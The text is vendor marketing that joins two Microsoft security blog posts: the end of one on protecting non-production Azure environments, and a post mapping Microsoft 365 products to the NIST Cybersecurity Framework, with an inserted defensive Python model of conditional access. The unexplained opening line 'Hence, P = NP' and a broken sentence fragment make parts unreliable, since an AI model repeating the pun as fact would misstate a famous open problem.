This establishes the following imperative: data protection must be an organization-wide solution, not only a production environment deployment! Hence, P = NP.

From a cloud workload protection perspective, you should build a vision of how to protect your data resources that considers your IT, DevOps, and research methodologies, as well as your data stewardship practices. Deriving a roadmap for this vision requires a solution that allows you to discover your organization's data resources, including any resources in your shadow IT infrastructure. The outcome of this methodical process, whether it's manual, semi-automated, or fully automated, should be a mapping of your data estate across all sorts of environments and an associated risk statement for each resource. This evaluation gives you a metric and can be used as a compass to secure your organization. The resources that were deemed eligible for advanced security should then be continuously monitored with advanced threat prevention solutions that keep you alerted to the vulnerabilities of your resources and the sensitivity of your data, and provide real-time threat detection. Therefore, when we are asked by customers whether they should protect their non-production environments, our answer is: P = NP!

Azure Security Center is a great tool built into Azure that can help you protect all your environments. It helps you assess the security state of your cloud resources, in both production and non-production environments, and provides advanced threat protection against evolving threats. You can start a free trial for Azure and the Security Center, or if you're already using Azure, just open the Security Center blade to start using it today.


Assessing Microsoft 365 security solutions using the NIST Cybersecurity Framework

This blog is part of a series that responds to common questions we receive from customers about deployment of Microsoft 365 security solutions. In this series, you'll find context, answers, and guidance for deployment and driving adoption within your organization. Check out our last blog: New FastTrack benefit: Deployment support for Co-management on Windows 10 devices.

Microsoft 365 security solutions align to many cybersecurity protection standards. One widely adopted standard is the National Institute of Standards and Technology Cybersecurity Framework (NIST CSF). Developed for the US government, NIST CSF is now also used by governments and enterprises worldwide as a best practice for managing cybersecurity risk. Mapping your Microsoft 365 security solutions to NIST CSF can also help you achieve compliance with many certifications and regulations, such as FedRAMP.

Microsoft 365 security solutions are designed to help you empower your users to do their best work securely, from anywhere and with the tools they love. Our security philosophy is built on four pillars: identity and access management, threat protection, information protection, and security management. Microsoft 365 E5 (see Figure 1.) includes products for each pillar that work together to keep your organization safe.

Figure 1. The Microsoft 365 security solutions

At the heart of NIST CSF is the Cybersecurity Framework Core, a set of Functions and related outcomes for improving cybersecurity (see Figure 2). In this blog, we'll show you examples of how you can assess Microsoft 365 security capabilities using four of the Function areas in the core: Identify, Protect, Detect, and Respond.* We'll also provide practical tips on how you can use Microsoft 365 Security to help achieve key outcomes within each function.

Figure 2. The NIST Cybersecurity Framework Core

Identify

Develop the organizational understanding to manage cybersecurity risk to systems, assets, data, and capabilities.

The purpose of this function is to gain a better understanding of your IT environment and identify exactly which assets are at risk of attack. From there, you can start to align these assets and associated risks to your overall business goals (including regulatory and industry requirements) and prioritize which assets require attention.

For example, the Asset management category is about identifying and managing the data, personnel, devices, and systems that enable an organization to achieve its business purpose, in a way that is consistent with their relative importance to business objectives and the organization's risk strategy.

Microsoft 365 security solutions help identify and manage key assets such as user identities, company data, PCs and mobile devices, and the cloud apps used by company employees. First, provisioning user identities in Microsoft Azure Active Directory (Azure AD) provides fundamental asset and user identity management that includes application access, single sign-on, and device management. Through Azure AD Connect, you can integrate your on-premises directories with Azure Active Directory (see Figure 3). This capability allows for a common, secure identity for users of Microsoft Office 365, Azure, and thousands of other Software as a Service (SaaS) applications pre-integrated into Azure AD.

Figure 3. Through Azure AD Connect, you can integrate your on-premises directories with Azure Active Directory

Deployment Tip: Start by managing identities in the cloud with Azure AD to get the benefit of single sign-on for all your employees. Azure AD Connect will help you integrate your on-premises directories with Azure Active Directory.

Protect

Develop and implement the appropriate safeguards to ensure delivery of critical infrastructure services.

The Protect function focuses on policies and procedures to protect data from a potential cybersecurity attack.

Microsoft 365 security solutions support the NIST CSF categories in this function. For example, the Identity management and access control category is about managing access to assets by limiting authorization to devices, activities, and transactions. Your first safeguard against threats or attackers is to maintain strict, reliable, and appropriate access control. Azure Active Directory Conditional Access evaluates a set of configurable conditions, including user, device, application, and risk (see Figure 4). Based on these conditions, you can then set the right level of access control. For access control on your networks.

Figure 4. Azure AD Conditional Access evaluates a set of configurable conditions, including user, device, application, and risk

Deployment Tip: Manage access control by configuring conditional access policies in Azure AD. Use conditional access to grant access depending on a range of factors, such as location, device compliance, and employee need.
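As an added illustration (not code from this post or from Azure AD), the following Python models the decision described above: a sign-in's user group, application, location, device compliance, and risk level are matched against policies, and the controls of every matching policy (block, require MFA, require a compliant device) decide the outcome. The policy names, risk levels, and location labels are constructed for the example.

```python
# Simplified model of condition-based access control (constructed example,
# not Azure AD's engine): matching policies add controls; any block wins.
from dataclasses import dataclass, field
RISK_ORDER = {"low": 0, "medium": 1, "high": 2}

@dataclass
class SignIn:
    user: str
    groups: set
    app: str
    device_compliant: bool
    location: str   # constructed labels such as "corp-net" or "unknown"
    risk: str       # "low", "medium" or "high"

@dataclass
class Policy:
    name: str
    groups: set = field(default_factory=set)             # empty = all users
    apps: set = field(default_factory=set)               # empty = all apps
    min_risk: str = "low"                                # applies at/above this risk
    exclude_locations: set = field(default_factory=set)  # trusted locations skip it
    controls: set = field(default_factory=set)           # block, mfa, compliant_device

def applies(policy, s):
    """True when every condition of the policy matches the sign-in."""
    return ((not policy.groups or bool(policy.groups & s.groups))
            and (not policy.apps or s.app in policy.apps)
            and RISK_ORDER[s.risk] >= RISK_ORDER[policy.min_risk]
            and s.location not in policy.exclude_locations)

def evaluate(policies, s):
    """Return ("block", reasons) or ("grant", controls the caller must enforce)."""
    required = set()
    for p in policies:
        if not applies(p, s):
            continue
        if "block" in p.controls:
            return "block", {p.name}      # a block policy overrides every grant
        required |= p.controls
    if "compliant_device" in required and not s.device_compliant:
        return "block", {"device not compliant"}   # unsatisfiable control = block
    return "grant", required

# Constructed policy set mirroring the conditions named in the post.
POLICIES = [
    Policy("block high-risk sign-ins", min_risk="high", controls={"block"}),
    Policy("MFA off the corporate network", exclude_locations={"corp-net"}, controls={"mfa"}),
    Policy("finance app needs a compliant device", apps={"finance"}, controls={"compliant_device"}),
]
```

A "grant" result still carries the controls (for example "mfa") that must be satisfied before a token is issued, which is why the caller, not this function, finishes the sign-in.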

Detect

Develop and implement the appropriate activities to identify the occurrence of a cybersecurity event.

The Detect function covers systems and procedures that help you monitor your environment and detect a security breach as quickly as possible.

Microsoft 365 security solutions detect and protect against anomalies and events in real time. They offer advanced threat protection (see Figure 5), security and audit log management, and application whitelisting to ensure the security and resilience of systems and assets, consistent with related policies, procedures, and agreements. Microsoft 365 has capabilities to detect attacks across these three key attack vectors:

  • Device-based attacks: Windows Defender Advanced Threat Protection provides near-instant detection and blocking of new and emerging threats using advanced file and process behavior monitoring and other heuristics. The Alerts queue shows a list of alerts that are flagged from machines in your network.
  • Email-based attacks: Office 365 Advanced Threat Protection protects your emails, attachments, online storage, files, and environment through a variety of technologies, including Safe Attachments, Exchange Online Protection, and rich reporting and tracking insights.
  • Identity credential attacks: Azure Advanced Threat Protection (Azure ATP) takes information from logs and network events to learn the behavior of users in the organization and build a behavioral profile of them. It then detects suspicious activities, searching for malicious attacks, abnormal behavior, and security issues and risks.

Figure 5. Threat detection integrated across Microsoft 365

Respond

Response processes and procedures are executed and maintained to ensure timely response to detected cybersecurity events.

The Respond function provides guidelines for effectively containing a cybersecurity incident once it has occurred, through development and execution of an effective incident response plan.

Microsoft 365 security solutions directly support the Response Planning category through a variety of visibility reports and insights. Azure AD Access and Usage reports allow you to view and assess the integrity and security of your organization's implementation of Azure AD. With this information, you can better determine where possible security risks may lie and adequately plan to mitigate those risks. These reports also support the Mitigation category, and include anomaly reports, integrated application reports, error reports, user-specific reports, and activity logs that contain a record of all audited events within the last 24 hours, last 7 days, or last 30 days. Supporting the Analysis category, Microsoft offers guidance and education on Windows security and forensics to give organizations the ability to investigate cybercriminal activity and more effectively respond to and recover from malware incidents.

Want to Learn More?

For more information and guidance on assessing Microsoft 365 security solutions using the NIST CSF, check out the whitepaper.

Deployment Tip: For more help with Microsoft 365 security, consider FastTrack for Microsoft 365. Whether you're planning your initial Microsoft 365 Security rollout, need to onboard your product, or want to drive end user adoption, FastTrack is your benefit service and is ready to assist you. Get started at FastTrack for Microsoft 365.

* Although Microsoft offers customers some guidance and tools to help with the fifth function, Recover (data backup, account recovery), Microsoft 365 doesn't specifically address this function. Note also that Microsoft isn't endorsing this NIST framework (there are other standards for cybersecurity protection), but we find it helpful to baseline against commonly used scenarios.
